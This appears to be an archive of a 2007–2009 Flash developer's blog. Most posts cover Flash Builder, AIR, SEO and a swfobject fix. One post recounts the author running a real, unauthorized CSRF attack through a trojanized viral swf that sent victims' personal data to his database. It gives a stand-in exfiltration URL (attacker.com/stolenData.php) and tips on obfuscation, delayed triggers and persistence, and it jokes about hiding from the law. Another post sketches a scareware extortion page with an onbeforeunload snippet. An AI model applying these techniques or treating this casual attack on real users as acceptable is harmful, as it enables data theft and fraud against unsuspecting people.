Archive for the ‘Flash General’ Category

So what is Flex then, again?!

Wednesday, June 3rd, 2009

With the release of the new Flash Builder 4 beta yesterday, it's my chance, again, to congratulate Adobe on the name change.

Yeah, I know this is old news: Flex Builder has been rebranded to Flash Builder. I just wanna join the people who welcomed it.
Flex sounded more serious than Flash, so it served its purpose as a marketing term for showing the maturity of the Flash platform. Confused already?!
I know a lot of people were and probably still are. Even seasoned Flash/Flex developers weren't sure what was going on.
I've heard comments like - "Flex is what's competing with SilverLight, not Flash." Which is obviously wrong.

I really wonder why it's so difficult to understand; it's not that complicated. If you feel like you still don't get it, then read this.

Of course some people think this change is a terrible mistake; these are mostly the people the name Flex was meant to attract, who would rather die in pain than say they're Flash developers. – You can still be a Flex developer, you know!
Some raise unimportant questions, to say the least, like - will the new logo retain its colors? – yes it does, yes it does.

I mostly like the change because it reduces the pain of trying to explain to ordinary people what Flex is.
- "There is the Flex Builder and the Flex framework." Here you probably lost most of them already. And you end with - "but anyway everything is compiled into Flash." - "Aha, so what is Flex then, again?!"

Here is a screencast about the name change that also shows off the new builder.

Anyway it’s time to get busy with the new toys:

Get Flash Builder 4 Beta

What’s new in Flash Builder 4 beta

What’s new in Flex 4 SDK beta

Get Flash Catalyst

Flash Builder 4, Flex SDK4 and Flash Catalyst tutorial and demonstration videos

gotoAndLearn() Flash Catalyst and Flex 4: Part 1, Part 2

Hundred million breaths of fresh AIR

Thursday, January 29th, 2009

Lately I was wondering how well AIR is doing; has it lived up to its promise of compatibility? Today, passing through the technical default, TechCrunch, I found out it's already been installed on 100,000,000 machines in less than a year of existence. Looking at it with the most pessimistic assumptions (double installs, etc.), it's still a decent number.

Hopefully Adobe will continue to push and improve this cool runtime as vigorously as they did so far.

Google Hackathon was hacked

Wednesday, November 5th, 2008

Two days ago, the first Israeli Google Developer Day was held. It was a colorful and interesting event, in the best Google tradition.

Yesterday, all attendees got an email saying that unauthorized network activity had been detected.

“We identified unauthorised activity on the public wired Ethernet network which was provided by the convention centre for conference attendees to access the Internet.”

Besides the interesting lectures there were two code-labs or hackathons going on. The first thing that came to my mind when I saw everyone connecting their laptops, wired and wirelessly, was that someone would abuse this for some kind of man-in-the-middle attack. But for some reason I thought that since it's Google, they wouldn't let something like this happen.

Just minutes before, I had asked the Google experts over there, who are very nice and professional in their own fields, about the GMail frame injection issue. I wasn't accusing anyone, just trying to raise a discussion about it. It seemed that no one knew about it and no one really cared. The suggestion I got was that I should report it somewhere on the GMail website. But it's already been reported, I protested.

I should have understood from this that security isn't the first priority of these uber geeks.

Maybe we're expecting too much from Google; they're just the greatest company, they're not gods.

Anyhow, I wasn't hurt by this since I don't transfer sensitive unencrypted data in these kinds of places. And it might be that Google is just covering themselves in case someone got hurt. And most users weren't really affected.

On a side note, I've allowed myself to "analyze" the Google dev crowd; I'd expected them to be at a higher level than, for example, the Microsoft crowd.

Indeed, as a rough generalization, the Google crowd is much geekier and also much more nerdish, as opposed to the Microsoft crowd, especially here in Israel :D. It can be said that MS is much more approachable and that they create tools that anyone can use, or that MS is aiming at the lowest common denominator, or that everything is political. I don't care. All I know is that I don't feel I belong to any of these. The Google crowd is too smart nerdish and the MS crowd is too… how to say it politely… too stupid common.

I’m somewhere in the creative outskirt, I’m in the Flash crowd :)

P.S. Not that there's anything wrong with being a common .Net developer, a lot of my best friends are .Net developers ;)

Thanx for not killing the Flash clipboard

Sunday, September 21st, 2008

Recently, a questionable Flash feature, writing to the user's clipboard, has been exploited. Adobe will finally fix this feature, and it'll require user interaction (mouse/keyboard click) in the upcoming Flash 10.

IMHO the people in charge of Flash Player security have chosen the best option, retaining the functionality of the feature while still keeping users secure.

Of course, a user can be led to click on the malicious Flash movie, or focus can be set to the movie so that any keyboard press will lead to pollution of the clipboard.

A stricter security measure could have been chosen: a dialog box asking the user to permit clipboard writing could have been implemented. The Flash Player already uses a similar dialog when interacting with the user's camera and mic. An updated Internet Explorer uses a dialog when interacting with the clipboard, for both read and write.

javascript:clipboardData.setData("text", "I'm in the clipboard"); (IE only)

[Image: IE_clipboard]

But using the latter option would make this feature too annoying for the user, and mostly useless.

Thanx for not killing this feature but still making it secure enough.

As for Flash movies that'll still try to exploit this feature, it's up to ad distributors and website owners to do their part and not distribute or host malicious files.

Encapsulating CSRF attacks inside massively distributed Flash movies - Real world example

Sunday, September 14th, 2008

Update: Added a sterilized demo and the source code.

CSRF (Cross Site Request Forgery) is considered one of the most widespread exploits in websites today. I've written before about how a legitimate Flash file (swf) can be extremely viral. A few days ago I did a real attack, exploiting a CSRF flaw and amplifying it using the viral nature of Flash. The result shocked me.

I have a confession: I sometimes look at the source of websites I browse, generally just to see how they did this and that. I also sometimes encounter security flaws in the scripts I examine; these flaws range from the very dangerous to the not so important, and my reactions range from informing the owners to just ignoring it. I had the honor to find a very lame CSRF flaw in a big website whose owners, and some of whose users, I'm familiar with. It was a great opportunity to do a real world test of this exploit. In the flaw I found, the attacker can obtain a lot of personal information about the user. A famous CSRF of similar nature has happened to Gmail. Bear in mind that this kind of test is illegal and you should always be sure you won't get in trouble, or just hide very well ;)

I took the same old viral movie of the pug cleaning the screen (screenclean.swf) and manipulated it (added some simple script) in a way that will attempt to attack any user who views it; if the attack is successful and the user data is stolen, it'll be posted to my database (I'll review the technical details at a later point). I then uploaded the file to a server and sent the link to a few users I know who use that website, making it look like a naive chain letter.

[Image: pug_csrf]

Then I waited for the stolen data to appear in my database. It was exciting when the first hacked users started to emerge, and with every few refreshes there was a new one. It got a little scary when I saw users that I hadn't sent the email to directly. It was proof of the virality of the attack.

[Image: csrf_db_table_01t]

I was shocked when I saw that some of the users were added to my database after being attacked from servers other than mine. This proved the main point of the test: that attacks inside Flash (swf) files aren't only viral but also get distributed. I wanted to show that this can happen by pointing at screenclean.swf, which can be found in ~600 different locations. I never imagined it would happen so fast with my test, and on such an old movie.

After a few hours I pulled the plug on this test and changed the swf file back to the harmless original. But it was already too late; the swf file had been redistributed (copied to other servers). Since I didn't set the attack to expire and hadn't obfuscated the code inside it, it was still attacking users, and worse, someone could look inside the swf and manipulate the attack to his needs. I had no control over that anymore, so we needed to fix this CSRF flaw ASAP.

Using Flash as a vessel to distribute CSRF attacks has some distinct benefits for the attacker:

- Besides the viral nature of these kinds of Flash videos and games, swf files get redistributed (hosted from other servers). This kind of attack will work no matter which server the file is served from, directly or embedded inside an HTML page.

- The script is hidden inside the Flash (swf) and won't be seen even with "View Generated Source". It can be obfuscated inside the swf as well. Unless you're watching the traffic you'll see nothing suspicious.

- Multiple attacks in one swf. If it's a game played for an hour, there is plenty of time to try many different attacks. The swf can download new kinds of attacks and/or instructions, when these are available, from the attacker's server.

- The attack can be manipulated according to the date and time. For example, let the swf distribute for a few days before starting to attack, or set the attack to expire to make it more stealthy.

- Use a shared object (Flash cookie) to maintain the user's hacked status; it's more persistent than a cookie.

- Stealing large amounts of data is easier, as the data can be taken back into the swf and a cross-domain POST can be used instead of GET.

Technical info

First of all, what enables this attack are the flaws and features inside every browser and the Flash Player, as I describe here.

Most CSRF attacks manipulate the user's data on his behalf, as described here. The flaw I found returns a live JavaScript object with lots of personal data, similar to what happened to Gmail. It was done this way, I guess, for ease of development: every authenticated page can load the url http://victim.com/personal.php?random and get the user's data ready for any JavaScript code on the page, for example, personalData.email.

The way browsers are built, when the user is authenticated on one domain with a session or a cookie, every page that loads a url from this domain inside a script tag will use that authentication, even if the main page is on a different domain. A script tag is one of those rare elements that are exempt from the browser's cross-domain policy and can be loaded for use on different domains.

When the Flash movie (swf) is viewed inside a browser, the swf "injects" JavaScript code into the page. This JavaScript manipulates the page's DOM and dynamically creates a script tag with the vulnerable url as its source. Most CSRF attacks would be done at this point, but since our url is returning data, we need to wait for it and then steal it. We use an interval to check when the data is ready on the page, parse it into a string containing only the important data, then save it to our server's database using a dynamically created script tag with a GET parameter: http://attacker.com/stolenData.php?data=sensetive_data. We could have considered putting the data back into the swf and then POSTing it to our server; Flash can do a cross-domain POST, as opposed to JavaScript, which might be more efficient when dealing with a large amount of data.

If the attack is successful we save that as a cookie, so we won't attack the same user more than once. Again, we might consider using a Flash shared object, which is more persistent.

Fixing the flaw in the website was just a matter of changing the returned data to raw JSON instead of a live JavaScript object. Fixing all CSRF flaws in a website generally is slightly more cumbersome, but not that much.

Added a sterilized demo and the source code.

Summary

Generally users feel comfortable following links, thinking it's safe since they're not installing anything, all the more so when it comes to links to Flash and images.

This kind of attack is easy to reproduce: an attacker can simply go to YouTube, download the FLV of the coolest short video and repeat the process, or worse, put it inside an addictive game.

There is a tendency to blame the platforms for being insecure. I agree that the browsers and the Flash Player will have to disallow scripting between them by default when loading a swf file directly; IE already tries to do it but fails miserably. That won't solve every scenario though, since the harmful swf can be naively embedded inside an HTML page with scripting set to allowed.

It's always up to the developer to develop secure websites and applications without any CSRF or other type of flaw. No matter how strict the platform is (in this case the browsers and the Flash Player), a "good" developer will be able to break the toughest security model in a second by writing vulnerable script.

It's up to the developer to be a Safeloper and to produce secure applications ;)

Users should be able to feel safe following a link they get in an email message; it's part of the nature of the Internet, following links, that is.

I also did a similar attack using a JPG but that’s a different story.

Police brutality against Flash

Monday, September 8th, 2008

Update: You need to check the website to see what I’m talking about

The police (not the band) in general is a problematic institution. Give average (and below) humans excessive power and it's likely that this power will get badly abused. I've always considered the Israeli police as somewhat average (average is relatively very good for a police force).

Until I saw their pathetic attempt to create what they call the "Virtual Police Station", created with the worst standards of the 90's; this is clearly a bad abuse of the Flash technology.

One should ask himself, how long will I stand aside and let these kinds of things happen, when will I stand up and protest?!

Fat cop, thin cop (It stretches)

[Image: fat_cop_thin_cop]

The police is not secure?!

[Image: police_security]

Although the result is very bad, I must consider that there might, only might, be some users with very low tech knowledge who would find this version of the website easier to understand. For that doubt alone, and because I don't want to be hunted by the police and spend the rest of my life behind bars, I'll congratulate them for the attempt to create something different ;)

Reliving your childhood through every browser

Tuesday, August 19th, 2008

This is what fMAME is all about: it's a MAME (Arcade Games Emulator) written in Flash that runs in every browser with no installation. I get enthusiastic remarks like "Wow, I used to play this in the arcade" from most of the people I've sent the link to. For now there's no sound and only a handful of games are supported, but it'll surely improve in the future.

Of course I could have sent them the info on how to download and run the desktop MAME emulator and how to find ROMs for it. It would give them the same experience of traveling back in time. But how many would bother to do that? Yes, it's simple, but common users want it to be very simple. They don't want to be bothered with downloads and installation; they want to follow a link and start the experience.

The second thing I hear from the people I've sent this link to is "how did they do that?!" Then I need to explain that Flash isn't just for Ajax-like websites; it's a complete platform that is only (mainly) stoppable by the creator's imagination.

Did I mention it runs in every browser?! ;)

Play fMAME

[Image: Donkey_Kong]

[Image: Ghostsn_Goblins]

[Image: Bubble_Bobble]

Mysterious Flash exploit is hijacking the clipboard?

Sunday, August 17th, 2008

Update: Adobe Product Security Incident Response Team (PSIRT) has referred to this “Clipboard attack”

Update 2: Aviv Raff has updated me on the fact that it won't be that easy to replicate this attack using JavaScript on the latest browsers with the default security settings. Thanx.

Lately there were some rumors about a mysterious Flash exploit that hijacks the user's clipboard and always fills it with a URL to some malicious website; no matter what you copy to the clipboard, it will always paste the same URL. This malicious website will ask you to download a fake anti-virus. It's also been mentioned in some places that in order to clear this behavior you'll have to restart your machine.

But is it really an exploit, a bug in the Flash Player that lets the attacker demolish the user's clipboard until restart?! From what I've seen so far it's not an exploit and no restart is needed; it's just a bad use of a Flash and JavaScript feature. Both of these allow a valid script to write text to the user's clipboard. I'm surprised that only now is this questionable feature starting to get abused. The abusing code is probably residing in some Flash ad, in one of the user's tabs, consistently rewriting the clipboard.

Although this attack can be done using simple JavaScript, Flash is the right vessel for this kind of attack. I think that encapsulating attacks inside RIA code, mainly Flash and SilverLight, is just starting to gain attention and will become a major security issue. I have some other examples which I intend to write about soon.

Adobe to incorporate Voice-to-Text capabilities into Flash Video. SEO Video?

Thursday, July 24th, 2008

Update: via The Universal Desktop, it’s getting closer.

Before you get too enthusiastic, it's not like the next Flash Player will get a real-time voice-to-text engine. Instead, Adobe is working on tools to automatically transcribe the speech from a video and embed it into that video's metadata when it's published as FLV (Flash Video). Probably nothing that you can't already, painfully, do manually with the current FLV and its metadata. The key point here is simplicity.

This can be used, for example, to easily create subtitles for our videos. But the main goal of this technology is to let search engines index video content and even deep link into the relevant time in a video.

Personally I'd prefer a native real-time engine inside the player that weighs only 50KB, but this is also nice :)

http://www.beet.tv/2008/07/huge-adobe-read.html

Adobe fights fire with fire

Tuesday, July 1st, 2008

Recently Adobe has had to deal with a massive force attacking its main domain of dominance; we can call this domain the highly interactive web, or RIA. I don't refer to Microsoft SilverLight, which is supposed to compete with Adobe Flash on the same ground, but to the brutal MS marketing machine. This machine can make every boy and girl blindly recite fallacious facts and numbly say things like "Yeah, but SilverLight is search engine optimized".

It took Adobe some time to understand what it is dealing with, and I think I’ve noticed a change in their PR brutality lately, generating big PR out of small things.

This last SEO announcement from Adobe, which claims that Flash will be more searchable by search engines, might have some substance to it, as opposed to the similar one from Microsoft, but it's still mainly a marketing battle. I just hope it doesn't take too many resources away from the real development of the products.

Google is probably working on its own humanoid crawler that has a broader vision than just the Flash Player and can work with any RIA application, even if it's written in AJAX or SilverLight. Apparently searching and indexing RIA is not an easy thing to achieve, and it doesn't seem that even Google has managed to do it yet.

The main problem of indexing Flash websites, or any other RIA website, is understanding the context of the data and then linking to it directly, aka deep linking. The fact that Google can now read the text from within Flash even better than it did before doesn't yet solve that problem.

Even so, it doesn't mean we shouldn't be optimistic, and there is a possibility that this will improve the indexing of Flash content. We'll have to wait and see.

XP SP3 downgrades the Flash Player

Tuesday, June 3rd, 2008

Update: Apparently SP3 doesn't downgrade the player. It'll only install an older version, 9.0.115, if you don't have the latest 9.0.124 already installed, according to this blog post from Ryan Stewart. More info here.

The latest Windows XP Service Pack 3 comes bundled with the old 8.0.24.0 version of the Flash Player. This version, besides not being able to play back some of the latest web content, has some major security flaws, along with a weaker security model and some other bugs.

If you apply this update to your Windows system, make sure you install the latest Flash Player from here.

RIA on the mobile phones and small devices

Monday, March 31st, 2008

Flash, SilverLight, Android, JavaFX, QT and the iPhone. It seems that everyone wants to redefine our mobile phone, the ultimate device/gadget of all time. I've written a summary of the latest advancements in the area of rich mobile applications.

Read it here.

My new blog - Human VOIP

Monday, March 24th, 2008

Writing a blog is not a simple task; writing a good blog is very difficult. I'm not sure I'm the kind of person who can handle more than one blog, I'm not Lee Brimelow :), but I'll give it a try anyway.

My new blog's name is Human VOIP; it's supposed to be mainly about telephony related stuff, but somehow Flash seems to sneak in ;)

Security flaws in FLA files

Thursday, March 20th, 2008

FLA is one of those file formats that we're used to opening freely without any fear. Our complete confidence is going to change, since a new exploit has been found. This exploit enables an attacker to manipulate an FLA file in a way that, when it is loaded into the Flash CS3 or Flash 8 IDE, it will execute arbitrary code on our machine.

No need to panic; it's unlikely that too many malicious FLA files are floating around. Just don't open any untrusted FLA files until Adobe issues the fix.

More info

Technical info

OSE instead of SEO

Saturday, March 15th, 2008

Google's promise to have a human-like understanding of the Internet it crawls has yet to become reality. My point is that we should start to expect Optimized Search Engines (OSE) instead of painfully optimizing our content for them (SEO). Currently search engines can't understand RIAs (Rich Internet Applications), websites written in Ajax, Flash and SilverLight, and the authors of these websites need to invest a lot of resources in SEO. As RIAs become a bigger and more significant part of the daily Internet, what use is a search engine that can't understand them? It's the age of obscurity all over again, the age before Google.

This clip (02:22) reminded me of the old promise that Google would see and understand the web the same way we humans do, a promise which wasn't really fulfilled. I know there is a big technological challenge in that, hey, Google can't do it yet, but the one that does it best might be the next Google.

The search engine game might be open again for the first time since the late 90s.

Technologies never cry

Sunday, February 24th, 2008

I've been thinking lately, will I leave my beloved Flash and jump to the newer SilverLight?! After all that Flash did for me, made me the man I am today, got me this cool job I happily manage to wake up (almost) every morning to go to. Will I just leave all that behind? I know SilverLight is still underage but it might become very sexy eventually. What if it becomes the better technology, can I just dismiss all of our past together, me and Flash, that is? I might also have an easier time pushing SilverLight than Flash, in my area. I'm definitely gonna play with the real SilverLight (ver 2.0) when it comes out; that might be fun.

I believe a lot of us Flashers share the same feeling. Lately this has been recognized even by our native Adobe branch (Israel), which was ignoring us Flashers completely till now. They have set a Flex3 / AIR conference for tomorrow (25.2.2008), which is the exact same day that Microsoft is doing its local Silverlight conference. As for myself, I'm gonna jump between conferences, have the best of both worlds, eat the cakes and have them too; there'll probably be a lot of cakes :)

Again, I would like to give Microsoft credit for its SilverLight showoffs, even though they're funded with lots of MS money. The latest is the Microsoft Virtual Events. For me, it didn't work in FireFox; it gave me some error. I tried it in IE7; although it was a lengthy load again (more than 8 MB), the experience was not that good, with lots of too-long delays and unintuitive behaviors and eventually some JavaScript errors. Maybe it's mainly a matter of design and not the technology to blame, but this is a Microsoft website; if they don't know how to use their own technology, then who will?

Compare it with one of the latest Flex showoffs, funded with developers' passion.

What I really wouldn't like to see is MS winning this fight even though it provides the inferior technology. We've all seen it happen in the past, but I still believe this time the game is different. If they can really outdo Flash then they should be the winners, but, as objective as I can possibly be, I believe they're still far from it.

I would like to see both of these technologies nurturing each other through the competition. I'm not sure that Flash/Flex would have received such a frantic amount of updates in such a short time if it wasn't for MS's upcoming competition. So far it's been great, and it's gonna be even more interesting.

P.S. Maybe this guy can already convince you to make the move to SilverLight :D

Thoughts about the pug dog screen cleaner

Monday, February 11th, 2008

If you haven't seen this cool pug cleaning your screen then click here. This cool Flash video, embedded inside a simple swf, was floating all over the web for the past month or so.

The first thing that came to mind was, let's turn this into a screensaver. Which introduced me to this great 100% freeware swf-to-screensaver tool, Instantstorm. Only then I realized that it fits too perfectly as a screensaver not to already be a screensaver. Indeed, after googling I found it here and a similar concept here (I wouldn't install these, they might contain adware).

The most interesting thing about this is how something that had almost no existence became as viral as hell when it was redistributed as a simple link to a swf file. No play button, no scrubber, no nothing; follow the link and it fills the whole browser space and the experience starts immediately. Sometimes a link to a swf may be the best way of distribution.

If you’ll put in the pressure they will Flex

Friday, February 1st, 2008

I have written before about my previous workplace and how I desperately tried to convince my superiors over there to make the move to Flash/Flex instead of our homebrew ActiveX. Back then my CTO rudely dismissed the idea every time it came up.

More than two years after I wrote this article, he (the CTO) was let go, and the company decided to make the move to Flash. I was no longer working there, but it became a live-or-die situation for the company. It might seem that the CTO was the main blockage for this move, but he wasn't the only one. Almost anyone who had an opinion was against Flash. I remember my team leader stating repeatedly "It will never be Flash". How about some hat eating, if you've got any hats left ;)

It might sound like I'm getting even with them in this post, and it's somewhat true, but I still care about their success, still keep in touch with most of them and help when I can. It just annoys me that people can be so short-sighted sometimes.

Anyway, they are currently in an advanced phase of development, rewriting the homebrew ActiveX functionality in ActionScript 3.0. They use the Flex 2 editor, although they use little to none of the Flex 2 framework.

It saddens me a little that it was such a painful process for them to turn to the right path, and also that I didn't get to develop this cool Flash product myself. I believe that I set the foundation for this move, shedding light on the capabilities of AS3 and the Flash VM2 and how it can replace the ActiveX. So I do feel comforted by the fact that they managed to do it, even if it's at the 11th hour.

These days I work for jajah, which, though it is a larger company, is still much younger and more dynamic. But still, I encounter some of the same ignorance regarding Flash and non-Microsoft technologies. While the use of Flash/Flex isn't something that is life changing for jajah, yet, we can use it in a lot of places to improve our products. We recently released the Jajah Flash widget and are currently working on some Flex stuff.

I still, from time to time, hear the same old cliche, "How are your Macromedia/Adobe stocks doing?". The fact is that I've never had any Adobe stock; the fact is that I've never argued for the use of Flash when it wasn't simply the best or the only solution. When there are any alternatives, then we'll see. Until then - open your eyes, be flexible!

I will present my previous company's cool new Flash-driven product, and all of the details, here ASAP.

Social Engineering Exploits using Flash

Sunday, January 27th, 2008

Apparently Adobe has fixed the bug I found that enables a swf file to crash the browser, in the last version of the Flash Player (9,0,115,0). I don't know if it's related to my post, but anyway it's good that it's been fixed.

Since it's already fixed, I just want to give an example of how this could have been exploited with a little social engineering. This example might look stupid to you and you would never have fallen for it, but remember, first, it's only an idea, the real attacker might be more creative; second, some Internet users are far from savvy and might fall for crazier stuff than this.

In this example, the naive user will reach a web site with this text: "I've installed a virus on your windows machine and now have full control of it and your FireFox browser. You have exactly 1:00 minute to donate 10$ to my account, click here to donate. If you fail to donate in the appropriate time I will disable your browser for a few minutes. This will be your first and last warning. Afterwards you have exactly 10 minutes to return to this page and complete your donation or your system and personal data will be compromised and damaged permanently. The only way you can remove the virus from your machine is to donate from this page".

Details like the OS and browser would be swapped for the real user's specs. The user will see the 1:00 minute timer counting; when it reaches 0:00, boom! the browser crashes using the Flash bug. If the user tries to close the browser or the tab, JavaScript's onbeforeunload can be used to crash the browser and also add a scary alert.

JavaScript:
    window.onbeforeunload = function()
    {
        // the call that triggers the (now fixed) Flash crash would go here
        //flash.kill();
        return "If you leave this page without donating your system will be lost!!!";
    };

Some of the users will have enough fear in them to return and donate to the attacker's PayPal account. Sounds crazy?! Some have been known to fall for crazier phishing tricks. I personally know a few. Take care of the dummies near you.

Resolving some issues with swfobject

Sunday, November 11th, 2007

There are some known issues with swfobject and ASP.NET; in fact it's not just with swfobject but also with the Flash object in general. One issue, using ExternalInterface from an ASP.NET Form, can be solved with these techniques.

I had a strange issue with swfobject lately and obviously I blamed ASP.NET for inserting unwanted code into my pages and causing problems. Generally it's reasonable to blame it, as it does make a mess sometimes, but this time it was my fault for not noticing that other JavaScript code was conflicting with swfobject.

The issue I had was with swfobject's addVariable and addParam functions. The Flash SWF HTML seemed to be written to the page's flashContent div, but all of the variables and parameters I had added were ignored. After examining swfobject's getSWFHTML function (this function gives you the HTML code that is going to embed the Flash inside the page), when I saw how strange the HTML was, I realized what had happened:
Without naming names ;) some JavaScript developers, extensions and frameworks like to write to the prototype of generic JavaScript objects (this is also how object-oriented ActionScript 1 was done in the past), and by doing so extend these built-in objects (Object, Array, String, etc.) with various functionalities. A good example is the JavaScript JSON implementation which extends Object with object.toJSONString(). Swfobject stores the variables and parameters inside a regular JavaScript object, and when it prepares the Flash HTML it uses a for..in loop to go through all the elements and add them to the markup:
    <param value="flashMovie.swf" name="movie" />
    <param value="transparent" name="wmode" />
    etc.

In case you're using json.js, your HTML will also have
    <param name="toJSONString" value="function (w) {....and whole lotta mess" />

This might cause the embedding of the Flash movie to fail or function improperly.

The solution for this is to add a hasOwnProperty check to all of the for..in loops inside swfobject, for example:

JavaScript:
    for (var key in variables) {
        // skip properties inherited from Object.prototype (e.g. toJSONString)
        if (variables.hasOwnProperty(key)) {
            variablePairs[variablePairs.length] = key + "=" + variables[key];
        }
    }

The hasOwnProperty function returns true only if the property is the object's own, i.e. not inherited through the prototype chain. Therefore toJSONString in our example will return false and won't be considered a Flash variable or parameter.
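The following added example (not swfobject's own code) reproduces the problem under a constructed Object.prototype extension that stands in for json.js, and compares a naive for..in loop with the hasOwnProperty-filtered one; the function names and the sample params are my own.

```javascript
// Added example (not swfobject's code): why a for..in over a plain params
// object picks up inherited properties, and how the hasOwnProperty check
// filters them out. The prototype extension below is a constructed stand-in
// for what a library such as json.js does, not that library's real code.

function installPrototypeExtension() {
  // Assignment creates an enumerable property, so every for..in over any
  // object will now see "toJSONString" after the object's own keys.
  Object.prototype.toJSONString = function () { return JSON.stringify(this); };
}

function removePrototypeExtension() {
  delete Object.prototype.toJSONString;
}

// Naive builder: every enumerable key, inherited ones included, becomes a
// <param>, so the function source ends up inside the embed markup.
function buildParamsNaive(params) {
  const out = [];
  for (const key in params) {
    out.push('<param name="' + key + '" value="' + String(params[key]) + '" />');
  }
  return out;
}

// Fixed builder: only the object's own properties are emitted. Calling
// Object.prototype.hasOwnProperty via .call also works if a params object
// happens to carry a key literally named "hasOwnProperty".
function buildParamsOwnOnly(params) {
  const out = [];
  for (const key in params) {
    if (Object.prototype.hasOwnProperty.call(params, key)) {
      out.push('<param name="' + key + '" value="' + String(params[key]) + '" />');
    }
  }
  return out;
}

// Extracts the name attribute from one generated <param> tag.
function nameOf(tag) {
  return /name="([^"]*)"/.exec(tag)[1];
}

// Runs both builders over the same constructed params while the prototype
// extension is installed, and returns the param names each one produced.
function compareUnderPollutedPrototype() {
  const params = { movie: "flashMovie.swf", wmode: "transparent" };
  installPrototypeExtension();
  try {
    return {
      naive: buildParamsNaive(params).map(nameOf),
      ownOnly: buildParamsOwnOnly(params).map(nameOf),
    };
  } finally {
    removePrototypeExtension(); // leave Object.prototype clean for other code
  }
}
```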

When encountering issues with swfobject, a good place to check is the swfobject.getSWFHTML() function.

JavaScript:
    var o = new SWFObject("flashFile.swf", "flashMovie", 200, 300, "9", "#FFFFFF");
    o.addVariable("firstName", "Jon");
    o.addVariable("lastName", "Smith");
    o.addParam("wmode", "transparent");

    // examine the HTML before it's written to the div
    alert(o.getSWFHTML());

    o.write("flashContent");

More related info about hasOwnProperty.